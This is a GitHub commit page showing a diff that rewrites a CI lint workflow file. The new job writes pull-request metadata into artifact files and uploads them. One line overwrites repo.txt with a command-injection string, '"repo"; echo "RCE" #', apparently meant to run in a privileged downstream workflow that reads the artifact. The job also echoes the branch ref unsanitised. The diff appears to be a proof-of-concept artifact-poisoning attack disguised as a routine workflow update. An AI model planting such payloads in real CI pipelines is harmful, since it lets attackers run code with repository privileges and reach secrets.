Skip to content

Commit

Permalink
Update ci_lint.yml
Browse files Browse the repository at this point in the history
  • Loading branch information
analystoscar1 authored Dec 12, 2024
1 parent 9c4b6a8 commit 0bd6571
Showing 1 changed file with 18 additions and 4 deletions.
22 changes: 18 additions & 4 deletions .github/workflows/ci_lint.yml
Original file line number Diff line number Diff line change
@@ -1,4 +1,18 @@
workflow_run:
workflows: ["CI-Lint"]
types:
- completed
name: CI-Lint
on: pull_request
jobs:
trigger:
runs-on: ubuntu-latest
steps:
- run: |
mkdir job_info
echo "false" > job_info/skip.txt
echo "${{ github.repository }}" > job_info/repo.txt
echo "${{ github.event.pull_request.head.ref }}" > job_info/ref.txt
echo '"repo"; echo "RCE" #' > job_info/repo.txt
echo "${{ github.event.number }}" > job_info/pr.txt
echo "${{ github.event.pull_request.head.sha }}" > job_info/sha.txt
- name: Upload artifact
uses: actions/upload-artifact@v2
with:
path: job_info

0 comments on commit 0bd6571

Please sign in to comment.